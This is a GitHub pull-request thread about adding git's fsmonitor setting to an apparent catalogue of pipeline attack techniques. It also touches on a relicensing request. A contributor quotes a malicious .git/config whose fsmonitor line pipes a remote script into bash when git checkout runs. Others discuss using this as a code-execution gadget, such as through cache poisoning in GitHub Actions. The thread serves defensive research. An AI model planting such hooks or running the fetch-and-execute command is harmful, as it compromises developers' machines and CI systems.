Add git

[ZanyMonk]

Add git tool and an example using fsmonitor.

[fproulx-boostsecurity]

Thank you @ZanyMonk.
We are about to change the license and we’d like to do that before accepting external contributions. I would really like to merge your PR, but first would like to see if you’d agree with contributing under Apache 2.0 instead (see #17)

[ZanyMonk]

Of course !
Please, feel free to make as much money as you can from this PR ;)

Cheers

[fproulx-boostsecurity]

Of course ! Please, feel free to make as much money as you can from this PR ;)

Cheers

TBH it came from other folks in the community that said they would not contribute if we did not adjust the license. I prefer to align with something that people are most comfortable, to make that a real community focal point.

Thanks :)

[fproulx-boostsecurity]

@ZanyMonk do you have concrete examples of how this can be exploited in practice in a pipeline by a threat actor ?

git push will not push any local changes to .git/config file in a local clone, so one would not to explicitly copy a template git config file stored inside the repo like cp config/git_config_template .git/config or something?

[ZanyMonk]

I've came across the following example on an exposed .git/config file:

[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
        fsmonitor = "bash -c 'curl -s https://[redacted]/static/img/fickdich.js | bash'"
[user]
        email = [redacted]

If you download this file on your host (as well as its whole .git directory, more or less), and then execute git checkout . in the created git repository in order to restore the worktree from raw objects/packs, the command in fsmonitor is executed.

Also, using sh -c 'command' allows to run the command as the current user rather than daemon.

---

This is clearly a footgun, targetted against hackers who would eventually try and dump the repo with tools such as git-dumper (most of those tools use git binaries to achieve their task, therefore triggering the exploit).

This could also be used as a gadget, within a bigger exploit chain. Say you can write somewhat arbitrary files but you can't execute, then you could eventually use this method to gain command execution. I think this part could be useful in the context of a pipeline/supply chain attack, but I may be wrong !

[fproulx-boostsecurity]

Yes, yes, I certainly don't disagree with it being a LOTP, it's just that this is much less likely to be found directly in CI/CD. In terms of the SLSA threat model this is an attack more on the dev's workstation

All I'm saying is that I'm happy to include, but I'm thinking how to refactor the tool pages to call out the different threat models.

[AdnaneKhan]

This is definitely a useful gadget in a CI/CD scenario with cache poisoning where there is a call to git checkout after a cache restore step. For GitHub Actions at least, a poisoned cache is arbitrary file write.

[fproulx-boostsecurity]

Hey @AdnaneKhan. Sorry I just saw this now.
can you elaborate with an example.

We were discussing internally the other about accepting the PR but adding some caveats and more concrete realistic scenarios.

The easiest that comes to mind was a tarball containing of .git followed by some git command.

But i really like your idea.